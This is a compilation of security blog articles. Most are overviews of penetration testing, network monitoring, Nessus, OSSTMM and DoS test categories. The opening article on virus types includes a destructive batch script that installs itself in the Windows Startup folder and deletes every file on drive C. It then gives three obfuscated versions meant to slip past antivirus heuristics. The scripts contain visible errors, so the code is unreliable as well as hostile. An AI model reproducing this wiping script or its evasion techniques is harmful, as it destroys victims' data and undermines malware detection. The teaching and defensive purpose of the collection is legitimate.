Ramy Al Damati

A virus or a worm is a malicious application which after execution harms the OS or the data in the system. The execution may occur automatically when an infected file is accessed, or by a condition such as a date or a directory access. Since the worms are a sort of viruses, the term virus is generally used for calling both worms and viruses. So wherever in this article it is not directly mentioned, virus means both Worms and Viruses.



Characteristic of viruses

Reside in the RAM

• Some sorts of viruses reside in the RAM in order to monitor the activities and reacting against them, or continuing harming the system.

Leave the memory immediately after execution

• A group of viruses leave the memory immediately after execution; therefore there will be the least track of them especially if they remove their source files.

Change their codes and the characteristics

• Some viruses are able to alter their codes in distribution or their method of infecting other files. There are a few viruses which are able to even generate new viruses.


Worms vs. Viruses


• Virus spreads to another PC only by transferring an infected file to it, but worm does this by itself. In other word, the virus only infects the files and once the file is transferred to another system and executed, then the virus is transferred. However, the worm distributes by methods such as putting an Autorun.inf in the shared folders or even exploiting vulnerabilities in applications and OS.

• According to the above item, viruses’ distribution methods are much limited than worms.

Note that nowadays most of the malicious applications are using both the distribution methods of viruses and worms together.


Types of Viruses

Stealth Viruses

• Once such a virus is activated, it infects the files but it does not add itself to them. Instead it puts its code in other place of the disk (even another partition) and since it has the control of the system, redirects the requests to the file to its code. This sort of virus mostly works with root kits and since the root kits can hide any program, the stealth viruses hide themselves using them. Using such a method enables the virus to listen the activities of the antivirus and whenever it requests for the virus, the stealth virus alters or corrupts the data sent to the antivirus and hence it is able to hide itself to be detected by the antivirus programs.

Polymorphic Viruses

• While infecting a file, these viruses alter the codes they add to the files; therefore in each infection a different virus is added to the file. The alteration may be a reform to a new code but with same activity, or it can be totally a new virus with a new format.

Cavity Viruses (Space Filter)

• These viruses add themselves to the end of the file and corrupt the header of it. So that the size of the file will remain unchanged although some extra codes are added to the file. The modification to the header of the file redirects the operating system to execute the virus first and afterward, start the file.

Camouflage Viruses

• This method of hiding is however a simple trick. The virus introduces itself as a harmless or even beneficial program (such as an antivirus) but after execution they do their malicious activities. This method is mostly similar to the method of Trojans.

Shell Viruses

• These viruses introduce themselves as the main application and the victim file will be a subroutine of the virus. Since the virus covers the victim file as an eggplant shell, they are called so.

Add-on Viruses.

• Most of viruses are of this type. They add themselves to the start of the file. When the file is executed the virus starts and while finished, the main application starts. Note that this sort of virus does not alter the header of the file.

Intrusive Viruses

• They are the most aggressive viruses. They completely or partially remove the victim file and overwrite themselves in place. In most of the cases the program will not function properly after the infection.

Companion Viruses

• They abuse this rule of Microsoft Windows that if there are two files with a same name but one of their extensions is .exe and the other one is .com, if the user just type the name of the file without indicating the extension, the .com file will be executed. Exploiting this, the virus copies itself with a same name of an executable file with .com extension.

File Extension Viruses:

• By default, Microsoft Windows does not show the known file extensions such as .exe, .bat or as the like. Exploiting this, the virus hides its executable extension (which is com or exe) by adding a fake and harmless extension such as txt, for instance: Bad.txt.exe

Self Modification

This section describes the methods that viruses use to modify themselves in order to hide from being detected by the antviruses, or make it loger.

Encryption by XOR

• In this method, the virus has two segments: the encoder segment, and the encoded data. The encoded part is the main part of the virus and performs the harmful actions. The task of the encoder segment is to decode the encoded data in each execution, and encoding this part in each infection. The method that the encoders use is to do XOR the data with a variable key and put this key in the new generated virus.

Polymorphic Code

• These sorts of viruses alter their codes by disordering their sequence. Using GOTO or Variable are the most common methods they use. Another method they use is that they contain several different virus codes inside them, and in each infection they use one of them as the main and functional virus.

Metamorphic Viruses

• They are the most complicated viruses. This kind of virus is able to alter their code and in each execution, it reprograms itself.

How a script hides from the Antivirus Heuristic

If the signature of the virus is produced, the antivirus will easily detect and eliminate it. But if the virus is not detected yet and therefore there is no signature for it (the Zero-Day period), then the antivirus should estimate if the file is a virus or not. The method that Antivirus uses to do the estimation is called Heuristic and is almost 70% to 80% accurate.

Controversially, the viruses use some methods to hide from this technology which below we will deal with one of them.

First we create a sample virus:

@echo off

Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat

C:

Cd\

Del *.* /f /q /s

Alright, the virus is ready!

It copies itself in the Startup folder of the system and deletes all the files in all the subdirectories of the drive C, and performs this in each restart. It is not a very real virus script but don’t play with the code in a real system!

In the first method, we alter the code using the GOTO method:

@echo off

Goto A

:E

Cd\

Goto B

:A

Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat

Goto C

:B

Del *.* /f /q /s

Exit /B

Goto D

:B

C:

Goto E

This method disturbs the sequence of the commands and hence it will be different from what the Heuristic has in its malicious definitions database.

The next method is to use variable for altering the code:

@Echo off

Set ypy=Copy

Set sk=Menu\Programs\Startup\a.bat

Set ls=0%

Set myj=%myj%

%ypy% %ls% %sk% Menu\Programs\Startup\a.bat

set ls=C:

%ls%

Set ypy=Cd\

%ypy%

Set re=voxdi

Set re=/s

Set ypy=Del

Set sk=sjvprduwtkmw

Set sk=/f

Set ls=wrvyecx

Set ls=*.*

Set myj=/q

%ypy% %ls% %sk% %myj% %re%

Again, this method changes the codes sequence and alters the commands look.

Now, if we combine the above two methods, the result will be much more complicated:

@echo off

set vf=Goto

set vc=A

%vf% %vc%

:E%%

set ik=Cd\

%ik%

Set vc=B

%vf% %vc%

:A%%

Set vc=wuju

Set vc=Copy

rem xfolwhuuuiqwd

Set rd=Users\Start

Set uhq=and

Set uq=Settings\All

Set ik=0%

Set rq=C:\Documents

%vc% %ik% %rq%%pvk% %uhq% %uq% %rd%%rg% Menu\Programs\Startup\a.bat

rem kshxnmudlnigqs

Set vc=C

%vf% %vc%

:B%%

Set ik=*.*

Set vc=qisjgf

Set vc=Del

Set uq=/s

Set rd=%rq%

Set rq=/f

Set uhq=/q

%vc% %ik% %rq% %uhq% %uq%

Set ik=/B

rem vfmcodgyevnutol

Set vc=Exit

%vc% %ik%

rem lrpcttoclg

Set vc=D

%vf% %vc%

:B%%

Set vc=C:

%vc%

Set vc=E

%vf% %vc%



Note that these scripts are only some samples and maybe do not work properly, however it is strongly recommended to perform any test and execution in a laboratory and test environment, and avoid applying them on your systems.

Read more...

Introduction



Penetration testing is an often confused term. Through this guide Corsaire, a world leader in information security, provides a broad overview of what it means, why you would want it, and how to get the most out of the process.

• What is a penetration test?

• Why conduct penetration testing?

• What can be tested?

• What should be tested?

• What do you get for the money?

• What to do to ensure the project is a success



What is a penetration test?

Much of the confusion surrounding penetration testing stems from the fact it is a relatively recent and rapidly evolving field. Additionally, many organisations will have their own internal terminology (one man's penetration test is another's vulnerability audit or technical risk assessment).


At its simplest, a penetration-test (actually, we prefer the term security assessment) is the process of actively evaluating your information security measures. Note the emphasis on 'active' assessment; the information systems will be tested to find any security issues, as opposed to a solely theoretical or paper-based audit.


The results of the assessment will then be documented in a report, which should be presented at a debriefing session, where questions can be answered and corrective strategies can be freely discussed.




Why conduct a penetration test?

From a business perspective, penetration testing helps safeguard your organisation against failure, through:

• Preventing financial loss through fraud (hackers, extortionists and disgruntled employees) or through lost revenue due to unreliable business systems and processes.

• Proving due diligence and compliance to your industry regulators, customers and shareholders. Non-compliance can result in your organisation losing business, receiving heavy fines, gathering bad PR or ultimately failing. At a personal level it can also mean the loss of your job, prosecution and sometimes even imprisonment.

• Protecting your brand by avoiding loss of consumer confidence and business reputation.

From an operational perspective, penetration testing helps shape information security strategy through:

• Identifying vulnerabilities and quantifying their impact and likelihood so that they can be managed proactively; budget can be allocated and corrective measures implemented.




What can be tested?

All parts of the way that your organisation captures, stores and processes information can be assessed; the systems that the information is stored in, the transmission channels that transport it, and the processes and personnel that manage it. Examples of areas that are commonly tested are:

• Off-the-shelf products (operating systems, applications, databases, networking equipment etc.)

• Bespoke development (dynamic web sites, in-house applications etc.)

• Telephony (war-dialling, remote access etc.)

• Wireless (WIFI, Bluetooth, IR, GSM, RFID etc.)

• Personnel (screening process, social engineering etc.)

• Physical (access controls, dumpster diving etc.)




What should be tested?

Ideally, your organisation should have already conducted a risk assessment, so will be aware of the main threats (such as communications failure, e-commerce failure, loss of confidential information etc.), and can now use a security assessment to identify any vulnerabilities that are related to these threats. If you haven't conducted a risk assessment, then it is common to start with the areas of greatest exposure, such as the public facing systems; web sites, email gateways, remote access platforms etc.

Sometimes the 'what' of the process may be dictated by the standards that your organisation is required to comply with. For example, a credit-card handling standard (like PCI) may require that all the components that store or process card-holder data are assessed.




What do you get for the money?

While a great deal of technical effort is applied during the testing and analysis, the real value of a penetration test is in the report and debriefing that you receive at the end. If they are not clear and easy to understand, then the whole exercise is of little worth.

Ideally the report and debriefing should be broken into sections that are specifically targeted at their intended audience. Executives need the business risks and possible solutions clearly described in layman's terms, managers need a broad overview of the situation without getting lost in detail, and technical personnel need a list of vulnerabilities to address, with recommended solutions.




What to do to ensure the project is a success

Defining the scope

The scope should be clearly defined, not only in the context of the components to be (or not to be) assessed and the constraints under which testing should be conducted, but also the business and technical objectives. For example penetration testing may be focussed purely on a single application on a single server, or may be more far reaching; including all hosts attached to a particular network.




Choosing a security partner

Another critical step to ensure that your project is a success is in choosing which supplier to use.

As an absolute fundamental when choosing a security partner, first eliminate the supplier who provided the systems that will be tested. To use them will create a conflict of interest (will they really tell you that they deployed the systems insecurely, or quietly ignore some issues).

Detailed below are some questions that you might want to ask your potential security partner:

• Is security assessment their core business?

• How long have they been providing security assessment services?

• Do they offer a range of services that can be tailored to your specific needs?

• Are they vendor independent (do they have NDAs with vendors that prevent them passing information to you)?

• Do they perform their own research, or are they dependent on out-of-date information that is placed in the public domain by others?

• What are their consultant's credentials?

• How experienced are the proposed testing team (how long have they been testing, and what is their background and age)?

• Do they hold professional certifications, such as PCI, CISSP, CISA, and CHECK?

• Are they recognised contributors within the security industry (white papers, advisories, public speakers etc)?

• Are the CVs available for the team that will be working on your project?

• How would the supplier approach the project?

• Do they have a standardised methodology that meets and exceeds the common ones, such as OSSTMM, CHECK and OWASP?

• Can you get access to a sample report to assess the output (is it something you could give to your executives; do they communicate the business issues in a non-technical manner)?

• What is their policy on confidentiality?

• Do they outsource or use contractors?

• Are references available from satisfied customers in the same industry sector?

• Is there a legal agreement that will protect you from negligence on behalf of the supplier?

• Does the supplier maintain sufficient insurance cover to protect your organisation?




Standards compliance

There are a number of good standards and guidelines in relation to information security in general, for penetration tests in particular, and for the storage of certain types of data. Any provider chosen should at least have a working knowledge of these standards and would ideally be exceeding their recommendations.

Notable organisations and standards include:



PCI

The Payment Card Industry (PCI) Data Security Requirements were established in December 2004, and apply to all Members, merchants, and service providers that store, process or transmit cardholder data. As well as a requirement to comply with this standard, there is a requirement to independently prove verification.



ISACA

ISACA was established in 1967 and has become a pace-setting global organization for information governance, control, security and audit professionals. Its IS Auditing and IS Control standards are followed by practitioners worldwide and its research pinpoints professional issues challenging its constituents. CISA, the Certified Information Systems Auditor is ISACA's cornerstone certification. Since 1978, the CISA exam has measured excellence in the area of IS auditing, control and security and has grown to be globally recognized and adopted worldwide as a symbol of achievement.




CHECK

The CESG IT Health Check scheme was instigated to ensure that sensitive government networks and those constituting the GSI (Government Secure Intranet) and CNI (Critical National Infrastructure) were secured and tested to a consistent high level. The methodology aims to identify known vulnerabilities in IT systems and networks which may compromise the confidentiality, integrity or availability of information held on that IT system. In the absence of other standards, CHECK has become the de-facto standard for penetration testing in the UK. This is mainly on account of its rigorous certification process. Whilst good it only concentrates on infrastructure testing and not application. However, open source methodologies such as the following are providing viable and comprehensive alternatives, without UK Government association. It must also be noted that CHECK consultants are only required when the assessment is for HMG or related parties, and meets the requirements above. If you want a CHECK test you will need to surrender your penetration testing results to CESG.




OSSTMM

The aim of The Open Source Security Testing Methodology Manual (OSSTMM) is to set forth a standard for Internet security testing. It is intended to form a comprehensive baseline for testing that, if followed, ensures a thorough and comprehensive penetration test has been undertaken. This should enable a client to be certain of the level of technical assessment independently of other organisation concerns, such as the corporate profile of the penetration-testing provider.




OWASP

The Open Web Application Security Project (OWASP) is an Open Source community project developing software tools and knowledge based documentation that helps people secure web applications and web services. It is an open source reference point for system architects, developers, vendors, consumers and security professionals involved in designing, developing, deploying and testing the security of web applications and Web Services.



The key areas of relevance are the forthcoming Guide to Testing Security of Web Applications and Web Services and the testing tools under the development projects. The Guide to Building Secure Web Applications not only covers design principals, but also is a useful document for setting out criteria by which to assess vendors and test systems.

Read more...

Review a checklist of analysis tasks


Analysis tasks can be considered preventive or reactive. Preventive methods include base-lining network communications to learn the current status of the network and application performance. Preventive analysis can also be used to spot network problems before they are felt by the network users. For example, identifying the cause of packet loss before it becomes excessive and affects network communications helps avoid problems before they are even noticed.



Reactive analysis techniques are employed after a complaint about network performance has been reported or when network problems are suspected. Sadly, reactive analysis is more common.




The following are some of the analysis tasks that can be performed using Wireshark:

• Find the top talkers on the network.

• Identify the protocols and applications in use.

• Determine the average packets per second rate and bytes per second rate of an application or all network traffic on a link.

• List all hosts communicating.

• Learn the packet lengths used by a data transfer application.

• Recognize the most common connection problems.

• Spot delays between client requests due to slow processing.

• Locate misconfigured hosts.

• Detect network or host congestion that is slowing down file transfers.

• Identify asynchronous traffic prioritization.

• Graph HTTP flows to examine website referral rates.

• Identify unusual scanning traffic on the network.

• Quickly identify HTTP error responses indicating client and server problems.

• Quickly identify VoIP error responses indicating client, server or global errors.

• Build graphs to compare traffic behavior.

• Graph application throughput and compare with overall link traffic seen.

• Identify applications that do not encrypt traffic.

• Play back VoIP conversations to hear the effects of various network problems on network traffic.

• Perform passive operating system and application use detection.

• Spot unusual protocols and unrecognized port number usage on the network.

• Examine the start-up process of hosts and applications on the network.

• Identify average and unacceptable service response times (SRT).

• Graph intervals of periodic packet generation applications or protocols.

Networks vary greatly in the traffic they see. The number and type of network analysis tasks you can perform depends on your network traffic characteristics.

Read more...

Port mirroring, also known as a roving analysis port, is a method of monitoring network traffic that forwards a copy of each incoming and outgoing packet from one port of a network switch to another port where the packet can be studied. A network administrator uses port mirroring as a diagnostic tool or debugging feature, especially when fending off an attack. It enables the administrator to keep close track of switch performance and alter it if necessary. Port mirroring can be managed locally or remotely.




An administrator configures port mirroring by assigning a port from which to copy all packets and another port where those packets will be sent. A packet bound for or heading away from the first port will be forwarded onto the second port as well. The administrator places a protocol analyzer on the port receiving the mirrored data to monitor each segment separately. The analyzer captures and evaluates the data without affecting the client on the original port.




The monitor port may be a port on the same SwitchModule with an attached RMON probe, a port on a different SwitchModule in the same hub, or the SwitchModule processor.




Port mirroring can consume significant CPU resources while active. Better choices for long-term monitoring may include a passive tap like an optical probe or an Ethernet repeater.

Read more...

FCAPS (fault-management, configuration, accounting, performance, and security) is an acronym for a categorical model of the working objectives of network management. There are five levels, called the fault-management level (F), the configuration level (C), the accounting level (A), the performance level (P), and the security level (S).




At the F level, network problems are found and corrected. Potential future problems are identified, and steps are taken to prevent them from occurring or recurring. In this way, the network is kept operational, and downtime is minimized.




At the C level, network operation is monitored and controlled. Hardware and programming changes, including the addition of new equipment and programs, modification of existing systems, and removal of obsolete systems and programs, are coordinated. An inventory of equipment and programs is kept and updated regularly.




The A level, which might also be called the allocation level, is devoted to distributing resources optimally and fairly among network subscribers. This makes the most effective use of the systems available, minimizing the cost of operation. This level is also responsible for ensuring that users are billed appropriately.




The P level is involved with managing the overall performance of the network. throughput is maximized, bottlenecks are avoided, and potential problems are identified. A major part of the effort is to identify which improvements will yield the greatest overall performance enhancement.




At the S level, the network is protected against hackers, unauthorized users, and physical or electronic sabotage. Confidentiality of user information is maintained where necessary or warranted. The security systems also allow network administrators to control what each individual authorized user can (and cannot) do with the system.

Read more...

Deep packet inspection (DPI) is an advanced method of packet filtering that functions at the Application layer of the OSI (Open Systems Interconnection) reference model. The use of DPI makes it possible to find, identify, classify, reroute or block packets with specific data or code payloads that conventional packet filtering, which examines only packet headers, cannot detect.




Using DPI, communications service providers can allocate available resources to streamline traffic flow. For example, a message tagged as high priority can be routed to its destination ahead of less important or low-priority messages or packets involved in casual Internet browsing. DPI can also be used for throttled data transfer to prevent P2P (peer-to-peer) abuse, improving network performance for most subscribers. The security implications of DPI are widespread because the technology makes it possible to identify the originator or recipient of content containing specific packets, a capability that has sparked concern among advocates of online privacy.



DPI has at least three significant limitations. First, it can create new vulnerabilities as well as protect against existing ones. While effective against buffer overflow attacks, denial of service attacks and certain types of malware, DPI can also be exploited to facilitate attacks in those same categories. Second, DPI adds to the complexity and unwieldy nature of existing firewalls and other security-related software. DPI requires its own periodic updates and revisions to remain optimally effective. Third, DPI can reduce computer speed because it increases the burden on the processor. Despite these limitations, many network administrators have embraced DPI technology in an attempt to cope with a perceived increase in the complexity and widespread nature of Internet-related perils.



Numerous companies, including such major players as Alcatel, Cisco, Ericsson, IBM, Microsoft, Nokia and Symantec have begun to aggressively market DPI technology as components of hardware and software firewalls.


Read more...

Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools. Nessus employs the Nessus Attack Scripting Language (NASL), a simple language that describes individual threats and potential attacks.





Nessus has a modular architecture consisting of centralized servers that conduct scanning, and remote clients that allow for administrator interaction. Administrators can include NASL descriptions of all suspected vulnerabilities to develop customized scans. Significant capabilities of Nessus include:

• Compatibility with computers and servers of all sizes.

• Detection of security holes in local or remote hosts.

• Detection of missing security updates and patches.

• Simulated attacks to pinpoint vulnerabilities.

• Execution of security tests in a contained environment.

• Scheduled security audits.




The Nessus server is currently available for Unix, Linux and FreeBSD. The client is available for Unix- or Windows-based operating systems.
Read more...

One of the crucial factors in the success of a pen-test is the underlying methodology. Lack of a formal methodology means no consistency -- and I am sure -- you don't want to be the one paying and watching the testers poking around cluelessly. While a penetration tester's skills need to be specialized for the job, the approach shouldn't be. In other words, a formal methodology should provide a disciplined framework for conducting a complete and accurate penetration test, but need not be restrictive -- it should allow the tester to fully explore his intuitions.



The Open Source Security Testing Methodology Manual (OSSTMM) by Pete Herzog has become a de-facto methodology for performing penetration testing and obtaining security metrics. According to Pete Herzog, "The primary goal of the OSSTMM is to provide transparency. It provides transparency of those who have inadequate security configurations and policies. It provides transparency of those who perform inadequate security and penetration tests. It provides transparency of the unscrupulous security vendors vying to sponge up every last cent of their prey's already meager security budget; those who would side-step business values with over-hyped threats of legal compliancy, cyber-terrorism, and hackers. The OSSTMM covers the whole process of risk assessment involved in a penetration test, from initial requirements analysis to report generation. The six areas of testing methodology covered are:

• Information security

• Process security

• Internet technology security

• Communications security

• Wireless security

• Physical security


The OSSTMM focuses on the technical details of exactly which items need to be tested, what to do before, during, and after a security test, and how to measure the results. New tests for international best practices, laws, regulations, and ethical concerns are regularly added and updated.


The National Institute of Standards and Technology (NIST) discusses penetration testing in Special Publication 800-42, Guideline on Network Security Testing. NIST's methodology is less comprehensive than the OSSTMM however it is more likely to be accepted by regulatory agencies.


Another area that requires attention is the penetration testing service provider. One of the biggest fears that every organization faces during a pen-test process is the chance of sensitive information being passed on to the wrong hands. Therefore, it becomes really important to gather as much information about the company (such as their technical abilities, certifications, experiences, methodology and tools employed) and make sure that you are dealing with professionals. In addition, there are several professional and government certifications that indicate the firm's trustworthiness and conformance to industry best practice.


Standards in penetration testing


Let's take a look at some of the standards and guidelines available:


Standards for Information Systems Auditing (ISACA): ISACA was established in 1967 and has become a pace-setting global organization for information governance, control, security and audit professionals. Its IS auditing and IS control standards are followed by practitioners worldwide and its research pinpoints professional issues challenging its constituents. CISA, the Certified Information Systems Auditor is ISACA's cornerstone certification.



CHECK: The CESG IT Health Check scheme was instigated to ensure that sensitive government networks and those constituting the GSI (Government Secure Intranet) and CNI (Critical National Infrastructure) were secured and tested to a consistent high level. The methodology aims to identify known vulnerabilities in IT systems and networks which may compromise the confidentiality, integrity or availability of information held on that IT system. CHECK consultants are only required when the assessment for HMG or related parties, and meets the requirements above. In the absence of other standards, CHECK became the de-facto standard for penetration tests and penetration testing in the UK. Companies belonging to CHECK must have employees that are security cleared and have passed the CESG Hacking Assault Course. However, open source methodologies such as the following are providing viable and comprehensive alternatives, without UK Government association.



OSSTMM: The aim of The Open Source Security Testing Methodology Manual is to set forth a standard for Internet security testing. It is intended to form a comprehensive baseline for testing that, if followed, ensures a thorough and comprehensive penetration test has been undertaken. This should enable a client to be certain of the level of technical assessment independently of other organization concerns, such as the corporate profile of the penetration-testing provider.



OWASP: The Open Web Application Security Project (OWASP) is an open source community project developing software tools and knowledge based documentation that helps people secure Web applications and Web services. OWASP is an open source reference point for system architects, developers, vendors, consumers and security professionals involved in designing, developing, deploying and testing the security of Web applications and Web Services. In short, the Open Web Application Security Project aims to help everyone and anyone build more secure Web applications and Web services.



Conclusion



Security is continuum, not an absolute. The value of penetration testing lies in its results -- the ones that answer the big question "WHY?" A successful penetration test indicates more than a particular flaw, it identifies the process failures that produced the vulnerability, at the first place. Fixing or patching the vulnerability detected does not mean an end to your security worries or nightmares -- it is just the beginning of a never-ending cycle.



The CRUX: A penetration test does not guarantee absolute security – it's just a measurement of your security posture. So, "never have a false sense of security".
Read more...

Denial of Service (DoS) testing

Denial of service testing involves attempting to exploit specific weaknesses on a system by exhausting the target's resources that will cause it to stop responding to legitimate requests. This testing can be performed using automated tools or manually. The different types of DoS can be broadly classified into software exploits and flooding attacks. Decisions regarding the extent of Denial of Service testing to be incorporated into a penetration testing exercise depend on the relative importance of ongoing, continued availability of the information systems and related processing activities. Denial of service can take a number of formats; those that are important to test for are listed below:



Resource overload – these attacks intend to overload the resources (i.e. memory) of a target so that it no longer responds.

Flood attacks – this involves sending a large amount of network requests with the intention of overloading the target. This can be performed via:

ICMP (Internet Control Message Protocol), known as "smurf" attacks

UDP (User Datagram Protocol), known as "fraggle" attacks



Half open SYN attack - this involves partially opening numerous TCP connections on the target, so that legitimate connections could not be started.



Out-of-band attacks – these attempt to crash targets by breaking IP header standards:

Oversized packets (ping of death) – the packet header indicates that there is more data in the packet than there actually is.

Fragmentation (teardrop attack) – sends overlapping fragmented packets (pieces of packets) which are under length.

IP source address spoofing (land attack) – causes a computer to create a TCP connection to itself.

Malformed UDP packet header (UDP bomb) – UDP headers indicate an incorrect length.



Application security testing

With the growth of ebusiness, core business functionality is now being offered through Web-based applications. While Internet facing applications give an organization the much needed global customer reach, providing access to partners inside the intranet introduces new security vulnerabilities because, even with a firewall and other monitoring systems, security can be compromised, since traffic must be allowed to pass through the firewall. The objective of application security testing is to evaluate the controls over the application (electronic commerce servers, on-line financial applications, distributed applications, and Internet front ends to legacy systems) and its process flow. Topics to be evaluated may include the application's usage of encryption to protect the confidentiality and integrity of information, how users are authenticated, integrity of the Internet user's session with the host application, and use of cookies – a block of data stored on a customer's computer that is used by the Web server application.

Let's take a look at some important components of application testing:



Code review: Code reviews involve analysing all the application-based code to ensure that it does not contain any sensitive information that an intruder might use to exploit an application. For example: Publicly available application code may include test comments, names or clear text passwords that will give an intruder a great deal of information about the application.

Authorization testing: Involves testing the systems responsible for the initiation and maintenance of user sessions. This will require testing:

Input validation of login fields – bad characters or overlong inputs can produce unpredictable results;

Cookie security – cookies can be stolen and legitimate sessions can be used by an unauthorised individual; and

Lockout testing – testing the timeout and intrusion lockout parameters set in the application, to ensure legitimate sessions cannot be hijacked.

This is performed to discover whether the login system can be forced into permitting unauthorised access. The testing will also reveal whether the system is susceptible to denial of service attacks using the same techniques.

Functionality testing: This involves testing the systems responsible for the application's functionality as presented to a user. This will require testing:

Input validation – bad characters, specific URLs or overlong inputs can produce unpredictable results; and

Transaction testing – ensuring that the application performs to specification and does not permit the user to abuse the system.

War dialing

War dialling is a technique for systematically calling a range of telephone numbers in an attempt to identify modems, remote access devices and maintenance connections of computers that may exist on an organization's network. Using war dialing tactics, a hacker maybe able to locate vulnerable out of band entry points into an organization and manipulate them to access the network. The ignorance of IT staff in considering the phone network, as a possible primary access point is one of the main factor in the growth of these attacks. For example: leaving open modems on critical network servers, routers and other devices can inadvertently expose an entry point inside the organization's network. In this testing, once a modem or other access device has been identified, analysis and exploitation techniques are performed to assess whether this connection can be used to penetrate the organization's information systems network.

Penetration testing for wireless networks

The introduction of wireless networks, whether inside corporate network infrastructure or common homes, introduces additional security exposures that are much more threatening than wired network attacks. Since, the only boundary wireless networks know are their signals, it becomes easy for hackers to identify wireless networks simply by "driving" or walking around office buildings with their wireless network equipment- this technique is known as "war driving". Once an open wireless access point is found, the war driver usually maps it, so at the end he would have a map of access points with their properties (SSID, WEP, MAC etc.). The goal of wireless network testing is to identify security gaps or flaws in the design, implementation or operation of the organization's wireless network.

Social engineering

Often used in conjunction with blind and double blind testing, social engineering refers to techniques of exploiting the very human nature (the most exploited of all being the human sense of trust and helping gesture) with the objective of gathering information. This is done using social interaction, typically with the organization's employees, suppliers and contractors, to gather information and penetrate the organization's systems. Such techniques could include:

Non face-to-face: Posing as a representative of the IT department's help desk and asking users to divulge their user account and password information;

Face-to-face or advanced social engineering: Posing as an employee and gaining physical access to restricted areas that may house sensitive information; intercepting mail, courier packages or even trash (dumpster diving) to search for sensitive information on printed materials.

Social engineering activities can test a less technical, but equally important, security component: the ability of the organization's people to contribute to or prevent unauthorized access to information and information systems. This also helps determine the level of security awareness among employees.


Read more...

Based on specific objectives to be achieved, the different penetration testing strategies include:




External testing strategy

External testing refers to attacks on the organization's network perimeter using procedures performed from outside the organization's systems, that is, from the Internet or Extranet. This test may be performed with non-or full disclosure of the environment in question. The test typically begins with publicly accessible information about the client, followed by network enumeration, targeting the company's externally visible servers or devices, such as the domain name server (DNS), e-mail server, Web server or firewall.



Internal testing strategy

Internal testing is performed from within the organization's technology environment. This test mimics an attack on the internal network by a disgruntled employee or an authorized visitor having standard access privileges. The focus is to understand what could happen if the network perimeter were successfully penetrated or what an authorized user could do to penetrate specific information resources within the organization's network. The techniques employed are similar in both types of testing although the results can vary greatly.



Blind testing strategy

A blind testing strategy aims at simulating the actions and procedures of a real hacker. Just like a real hacking attempt, the testing team is provided with only limited or no information concerning the organization, prior to conducting the test. The penetration testing team uses publicly available information (such as corporate Web site, domain name registry, Internet discussion board, USENET and other places of information) to gather information about the target and conduct its penetration tests. Though blind testing can provide a lot of information about the organization (so called inside information) that may have been otherwise unknown -- for example, a blind penetration may uncover such issues as additional Internet access points, directly connected networks, publicly available confidential/proprietary information, etc. But it is more time consuming and expensive because of the effort required by the testing team to research the target.



Double blind testing strategy

A double-blind test is an extension of the blind testing strategy. In this exercise, the organization's IT and security staff are not notified or informed beforehand and are "blind" to the planned testing activities. Double-blind testing is an important component of testing, as it can test the organization's security monitoring and incident identification, escalation and response procedures. As clear from the objective of this test, only a few people within the organization are made aware of the testing. Normally it's only the project manager who carefully watches the whole exercise to ensure that the testing procedures and the organization's incident response procedures can be terminated when the objectives of the test have been achieved.



Targeted testing strategy

Targeted testing or the lights-turned-on approach as it is often referred to, involves both the organization's IT team and the penetration testing team to carry out the test. There is a clear understanding of the testing activities and information concerning the target and the network design. A targeted testing approach may be more efficient and cost-effective when the objective of the test is focused more on the technical setting, or on the design of the network, than on the organization's incident response and other operational procedures. Unlike blind testing, a targeted test can be executed in less time and effort, the only difference being that it may not provide as complete a picture of an organization's security vulnerabilities and response capabilities.

Now that we have explored the different strategies in penetration testing, lets take a look at some of the techniques/ methods used in a penetration test and how it helps in performing a successful penetration testing:





Passive research

As the name suggests, a passive research is a method used to gather as much information about an organization's systems configuration from public domain sources such as:

DNS (domain name service)

RIPE (Réseaux IP Européens)

USENET (newsgroups)

ARIN (American Registry for Internet Numbers)

*Passive research is generally performed at the beginning of an external penetration test.





Open source monitoring

This service is an associated technique that utilizes Internet meta-searches (multiple searches of Web sites, newswires, newsgroups and other sources) targeted on keyword that are important to the organization. The data is collected and discoveries are highlighted to the organization. This helps identify whether organization's confidential information has been leaked or whether an electronic conversation involving them has taken place. This enables an organization to take necessary measures to ensure confidentiality and integrity.



Network mapping and OS fingerprinting

Visualization of network configuration is an important part of penetration testing. Network mapping is used to create a picture of the configuration of the network being tested. A network diagram can be created which infers the logical locations and IP addresses of routers, firewalls, Web servers and other border devices.

Additionally, this examination can assist in identifying or "fingerprinting" operating systems. A combination of results from passive research and tools such as ping, traceroute and nmap, can help create a reasonably accurate network map.



An extension of network mapping is Port Scanning. This technique is aimed at identifying the type of services available on the target machine. The scan result reveals important information such as function of a computer (whether it is a Web server, mail server etc) as well as revealing ports that may be serious security risks such as telnet. Port scans should include number of individual tests, including:



TCP (Transmission Control Protocol) scan

Connect scan

SYN (or half open) scan

RST (or Xmas-tree) scan

UDP (User Datagram Protocol) and ICMP (Internet Control Message Protocol) scans. Tools such as nmap can perform this type of scan.

Dynamic ports used by RPC (Remote Procedure Call) should be scanned using tool such as RPCinfo.



Spoofing

Spoofing involves creation of TCP/IP packets using somebody else's Internet addresses and then sending the same to the targeted computer making it believe that it came from a trusted source. It is the act of using one machine to impersonate another. Routers use the "destination IP" address in order to forward packets through the Internet, but ignore the "source IP" address. The destination machine only uses that source IP address when it responds back to the source. This technique is used in internal and external penetration testing to access computers that have been instructed to only reply to specific computers. This can result in sensitive information be released to unauthorised systems. IP spoofing is also an integral part of many network attacks that do not need to see responses (blind spoofing).



Network sniffing

Sniffing is technique used to capture data as it travels across a network. Sniffing is an important information gathering technique that enables capturing of specific information, such as passwords and also an entire conversation between specific computers, if required. To perform sniffing, the network card of computer needs to be put in promiscuous mode, so that it captures all data being sent across the network.

Sniffing is extensively used in internal testing where the sniffer or the computer in promiscuous mode is directly attached to the network enabling capturing of a great deal of information. Sniffing can be performed by a number of commercial tools such as Ethereal, Network Associates SnifferPro and Network Instruments Observer.





Trojan attack

Trojans are malicious programs that are typically sent into network as e-mail attachments or transferred via IM chat rooms. These programs run in stealth mode and get installed on the client computer without the users knowledge. Once installed, they can open remote control channels to attackers or capture information. A penetration test aims at attempting to send specially prepared Trojans into a network.



Brute force attack

A brute force attack involves trying a huge number of alphanumeric combinations and exhaustive trial and error methods in order find legitimate authentication credentials. The objective behind this time consuming exercise is to gain access to the target system. Brute force attacks can overload a system and can possibly stop it from responding to legitimate requests. Additionally, if account lockout is being used, brute force attacks may close the account to legitimate users.



